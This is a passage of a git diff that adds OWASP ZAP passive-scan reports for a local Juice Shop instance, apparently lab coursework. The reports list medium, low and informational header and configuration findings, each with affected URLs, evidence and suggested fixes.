Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other InfoNo links have been found while there are scripts, which is an indication that this is a modern web application.
URLhttp://localhost:3000/sitemap.xml
MethodGET
Parameter
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other InfoNo links have been found while there are scripts, which is an indication that this is a modern web application.
Instances11
Solution +
This is an informational alert and so no changes are required.
+ +
Reference
CWE Id
WASC Id
Plugin Id10109
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
Informational
Non-Storable Content
Description +
The response contents are not storable by caching components such as proxy servers. If the response does not contain sensitive, personal or user-specific information, it may benefit from being stored and cached, to improve performance.
+ +
URLhttp://localhost:3000/ftp
MethodGET
Parameter
Attack
Evidenceauthorization:
Other Info
URLhttp://localhost:3000/ftp/coupons_2013.md.bak
MethodGET
Parameter
Attack
Evidenceauthorization:
Other Info
URLhttp://localhost:3000/ftp/package-lock.json.bak
MethodGET
Parameter
Attack
Evidenceauthorization:
Other Info
URLhttp://localhost:3000/robots.txt
MethodGET
Parameter
Attack
Evidenceauthorization:
Other Info
Instances4
Solution +
The content may be marked as storable by ensuring that the following conditions are satisfied:
+
+ +
The request method must be understood by the cache and defined as being cacheable ("GET", "HEAD", and "POST" are currently defined as cacheable)
+
+ +
The response status code must be understood by the cache (one of the 1XX, 2XX, 3XX, 4XX, or 5XX response classes are generally understood)
+
+ +
The "no-store" cache directive must not appear in the request or response header fields
+
+ +
For caching by "shared" caches such as "proxy" caches, the "private" response directive must not appear in the response
+
+ +
For caching by "shared" caches such as "proxy" caches, the "Authorization" header field must not appear in the request, unless the response explicitly allows it (using one of the "must-revalidate", "public", or "s-maxage" Cache-Control response directives)
+
+ +
In addition to the conditions above, at least one of the following conditions must also be satisfied by the response:
+
+ +
It must contain an "Expires" header field
+
+ +
It must contain a "max-age" response directive
+
+ +
For "shared" caches such as "proxy" caches, it must contain a "s-maxage" response directive
+
+ +
It must contain a "Cache Control Extension" that allows it to be cached
+
+ +
It must have a status code that is defined as cacheable by default (200, 203, 204, 206, 300, 301, 404, 405, 410, 414, 501).
+ +
Reference + https://datatracker.ietf.org/doc/html/rfc7234 +
+ + https://datatracker.ietf.org/doc/html/rfc7231 +
+ + https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html + +
CWE Id524
WASC Id13
Plugin Id10049
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
Informational
Storable but Non-Cacheable Content
Description +
The response contents are storable by caching components such as proxy servers, but will not be retrieved directly from the cache, without validating the request upstream, in response to similar requests from other users.
+ +
URLhttp://localhost:3000
MethodGET
Parameter
Attack
Evidencemax-age=0
Other Info
URLhttp://localhost:3000/
MethodGET
Parameter
Attack
Evidencemax-age=0
Other Info
URLhttp://localhost:3000/ftp/legal.md
MethodGET
Parameter
Attack
Evidencemax-age=0
Other Info
URLhttp://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico
MethodGET
Parameter
Attack
Evidencemax-age=0
Other Info
URLhttp://localhost:3000/polyfills.js
MethodGET
Parameter
Attack
Evidencemax-age=0
Other Info
URLhttp://localhost:3000/sitemap.xml
MethodGET
Parameter
Attack
Evidencemax-age=0
Other Info
URLhttp://localhost:3000/styles.css
MethodGET
Parameter
Attack
Evidencemax-age=0
Other Info
Instances7
Solution
Reference + https://datatracker.ietf.org/doc/html/rfc7234 +
+ + https://datatracker.ietf.org/doc/html/rfc7231 +
+ + https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html + +
CWE Id524
WASC Id13
Plugin Id10049
+
+ + + + + +

Sequence Details

+ With the associated active scan results. + + + +
+ + + + + + + diff --git a/labs/lab5/zap/report-noauth.html b/labs/lab5/zap/report-noauth.html new file mode 100644 index 00000000..885d06ba --- /dev/null +++ b/labs/lab5/zap/report-noauth.html @@ -0,0 +1,5489 @@ + + + + +ZAP Scanning Report + + + +

+ + + ZAP Scanning Report +

+

+ + +

+ + Site: http://localhost:3000 + +

+ +

+ Generated on Mon, 13 Apr 2026 08:58:22 +

+ +

+ ZAP Version: 2.16.1 +

+ +

+ ZAP by Checkmarx +

+ + +

Summary of Alerts

+ + + + + + + + + + + + + + + + + + + + + + + + + +
Risk LevelNumber of Alerts
+
High
+ 		+
0
+
+
Medium
+ 		+
2
+
+
Low
+ 		+
6
+
+
Informational
+ 		+
5
+
+
False Positives:
+ 		+
0
+
+
+ + + + +

Summary of Sequences

+

For each step: result (Pass/Fail) - risk (of highest alert(s) for the step, if any).

+ + + + + + +

Alerts

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameRisk LevelNumber of Instances
Content Security Policy (CSP) Header Not SetMedium22
Cross-Domain MisconfigurationMedium8
Cross-Domain JavaScript Source File InclusionLow18
Dangerous JS FunctionsLow2
Deprecated Feature Policy Header SetLow11
Insufficient Site Isolation Against Spectre VulnerabilityLow24
Timestamp Disclosure - UnixLow16
ZAP is Out of DateLow1
Information Disclosure - Suspicious CommentsInformational2
Modern Web ApplicationInformational14
Non-Storable ContentInformational3
Storable and Cacheable ContentInformational1
Storable but Non-Cacheable ContentInformational11
+
+ + + +

Alert Detail

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
Medium
Content Security Policy (CSP) Header Not Set
Description +
Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware. CSP provides a set of standard HTTP headers that allow website owners to declare approved sources of content that browsers should be allowed to load on that page — covered types are JavaScript, CSS, HTML frames, fonts, images and embeddable objects such as Java applets, ActiveX, audio and video files.
+ +
URLhttp://localhost:3000
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/ftp
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/ftp/coupons_2013.md.bak
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/ftp/eastere.gg
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/ftp/encrypt.pyc
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/ftp/package-lock.json.bak
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/ftp/package.json.bak
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/ftp/suspicious_errors.yml
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/build/routes/styles.css
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/favicon_js.ico
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/styles.css
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:286:9
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:376:14
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/layer.js:95:5
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/runtime.js
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/styles.css
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/vendor.js
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/serve-index/assets/public/assets/public/favicon_js.ico
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/serve-index/styles.css
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/sitemap.xml
MethodGET
Parameter
Attack
Evidence
Other Info
Instances22
Solution +
Ensure that your web server, application server, load balancer, etc. is configured to set the Content-Security-Policy header.
+ +
Reference + https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP +
+ + https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html +
+ + https://www.w3.org/TR/CSP/ +
+ + https://w3c.github.io/webappsec-csp/ +
+ + https://web.dev/articles/csp +
+ + https://caniuse.com/#feat=contentsecuritypolicy +
+ + https://content-security-policy.com/ + +
CWE Id693
WASC Id15
Plugin Id10038
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
Medium
Cross-Domain Misconfiguration
Description +
Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server.
+ +
URLhttp://localhost:3000
MethodGET
Parameter
Attack
EvidenceAccess-Control-Allow-Origin: *
Other InfoThe CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
URLhttp://localhost:3000/ftp/eastere.gg
MethodGET
Parameter
Attack
EvidenceAccess-Control-Allow-Origin: *
Other InfoThe CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
URLhttp://localhost:3000/ftp/incident-support.kdbx
MethodGET
Parameter
Attack
EvidenceAccess-Control-Allow-Origin: *
Other InfoThe CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
URLhttp://localhost:3000/main.js
MethodGET
Parameter
Attack
EvidenceAccess-Control-Allow-Origin: *
Other InfoThe CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
URLhttp://localhost:3000/runtime.js
MethodGET
Parameter
Attack
EvidenceAccess-Control-Allow-Origin: *
Other InfoThe CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
URLhttp://localhost:3000/sitemap.xml
MethodGET
Parameter
Attack
EvidenceAccess-Control-Allow-Origin: *
Other InfoThe CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
URLhttp://localhost:3000/styles.css
MethodGET
Parameter
Attack
EvidenceAccess-Control-Allow-Origin: *
Other InfoThe CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
URLhttp://localhost:3000/vendor.js
MethodGET
Parameter
Attack
EvidenceAccess-Control-Allow-Origin: *
Other InfoThe CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
Instances8
Solution +
Ensure that sensitive data is not available in an unauthenticated manner (using IP address white-listing, for instance).
+
+ +
Configure the "Access-Control-Allow-Origin" HTTP header to a more restrictive set of domains, or remove all CORS headers entirely, to allow the web browser to enforce the Same Origin Policy (SOP) in a more restrictive manner.
+ +
Reference + https://vulncat.fortify.com/en/detail?category=HTML5&subcategory=Overly%20Permissive%20CORS%20Policy + +
CWE Id264
WASC Id14
Plugin Id10098
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
Low
Cross-Domain JavaScript Source File Inclusion
Description +
The page includes one or more script files from a third-party domain.
+ +
URLhttp://localhost:3000
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other Info
URLhttp://localhost:3000
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
Other Info
URLhttp://localhost:3000/juice-shop/build/routes/fileServer.js:43:13
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other Info
URLhttp://localhost:3000/juice-shop/build/routes/fileServer.js:43:13
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
Other Info
URLhttp://localhost:3000/juice-shop/build/routes/styles.css
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other Info
URLhttp://localhost:3000/juice-shop/build/routes/styles.css
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/styles.css
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/styles.css
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/runtime.js
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/runtime.js
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/styles.css
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/styles.css
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/vendor.js
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/vendor.js
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/serve-index/styles.css
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/serve-index/styles.css
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
Other Info
URLhttp://localhost:3000/sitemap.xml
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other Info
URLhttp://localhost:3000/sitemap.xml
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
Other Info
Instances18
Solution +
Ensure JavaScript source files are loaded from only trusted sources, and the sources can't be controlled by end users of the application.
+ +
Reference
CWE Id829
WASC Id15
Plugin Id10017
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
Low
Dangerous JS Functions
Description +
A dangerous JS function seems to be in use that would leave the site vulnerable.
+ +
URLhttp://localhost:3000/main.js
MethodGET
Parameter
Attack
EvidencebypassSecurityTrustHtml(
Other Info
URLhttp://localhost:3000/vendor.js
MethodGET
Parameter
Attack
EvidencebypassSecurityTrustHtml(
Other Info
Instances2
Solution +
See the references for security advice on the use of these functions.
+ +
Reference + https://v17.angular.io/guide/security + +
CWE Id749
WASC Id
Plugin Id10110
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
Low
Deprecated Feature Policy Header Set
Description +
The header has now been renamed to Permissions-Policy.
+ +
URLhttp://localhost:3000
MethodGET
Parameter
Attack
EvidenceFeature-Policy
Other Info
URLhttp://localhost:3000/ftp/coupons_2013.md.bak
MethodGET
Parameter
Attack
EvidenceFeature-Policy
Other Info
URLhttp://localhost:3000/ftp/eastere.gg
MethodGET
Parameter
Attack
EvidenceFeature-Policy
Other Info
URLhttp://localhost:3000/ftp/encrypt.pyc
MethodGET
Parameter
Attack
EvidenceFeature-Policy
Other Info
URLhttp://localhost:3000/ftp/package-lock.json.bak
MethodGET
Parameter
Attack
EvidenceFeature-Policy
Other Info
URLhttp://localhost:3000/ftp/suspicious_errors.yml
MethodGET
Parameter
Attack
EvidenceFeature-Policy
Other Info
URLhttp://localhost:3000/main.js
MethodGET
Parameter
Attack
EvidenceFeature-Policy
Other Info
URLhttp://localhost:3000/polyfills.js
MethodGET
Parameter
Attack
EvidenceFeature-Policy
Other Info
URLhttp://localhost:3000/runtime.js
MethodGET
Parameter
Attack
EvidenceFeature-Policy
Other Info
URLhttp://localhost:3000/sitemap.xml
MethodGET
Parameter
Attack
EvidenceFeature-Policy
Other Info
URLhttp://localhost:3000/vendor.js
MethodGET
Parameter
Attack
EvidenceFeature-Policy
Other Info
Instances11
Solution +
Ensure that your web server, application server, load balancer, etc. is configured to set the Permissions-Policy header instead of the Feature-Policy header.
+ +
Reference + https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Permissions-Policy +
+ + https://scotthelme.co.uk/goodbye-feature-policy-and-hello-permissions-policy/ + +
CWE Id16
WASC Id15
Plugin Id10063
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
Low
Insufficient Site Isolation Against Spectre Vulnerability
Description +
Cross-Origin-Embedder-Policy header is a response header that prevents a document from loading any cross-origin resources that don't explicitly grant the document permission (using CORP or CORS).
+ +
URLhttp://localhost:3000
MethodGET
ParameterCross-Origin-Embedder-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/ftp
MethodGET
ParameterCross-Origin-Embedder-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/build/routes/fileServer.js:43:13
MethodGET
ParameterCross-Origin-Embedder-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/build/routes/main.js
MethodGET
ParameterCross-Origin-Embedder-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/assets/public/favicon_js.ico
MethodGET
ParameterCross-Origin-Embedder-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:328:13
MethodGET
ParameterCross-Origin-Embedder-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:376:14
MethodGET
ParameterCross-Origin-Embedder-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/runtime.js
MethodGET
ParameterCross-Origin-Embedder-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/styles.css
MethodGET
ParameterCross-Origin-Embedder-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/serve-index/assets/public/assets/public/favicon_js.ico
MethodGET
ParameterCross-Origin-Embedder-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/serve-index/assets/public/styles.css
MethodGET
ParameterCross-Origin-Embedder-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/sitemap.xml
MethodGET
ParameterCross-Origin-Embedder-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000
MethodGET
ParameterCross-Origin-Opener-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/ftp
MethodGET
ParameterCross-Origin-Opener-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/build/routes/fileServer.js:43:13
MethodGET
ParameterCross-Origin-Opener-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/build/routes/main.js
MethodGET
ParameterCross-Origin-Opener-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/assets/public/favicon_js.ico
MethodGET
ParameterCross-Origin-Opener-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:328:13
MethodGET
ParameterCross-Origin-Opener-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:376:14
MethodGET
ParameterCross-Origin-Opener-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/runtime.js
MethodGET
ParameterCross-Origin-Opener-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/styles.css
MethodGET
ParameterCross-Origin-Opener-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/serve-index/assets/public/assets/public/favicon_js.ico
MethodGET
ParameterCross-Origin-Opener-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/serve-index/assets/public/styles.css
MethodGET
ParameterCross-Origin-Opener-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/sitemap.xml
MethodGET
ParameterCross-Origin-Opener-Policy
Attack
Evidence
Other Info
Instances24
Solution +
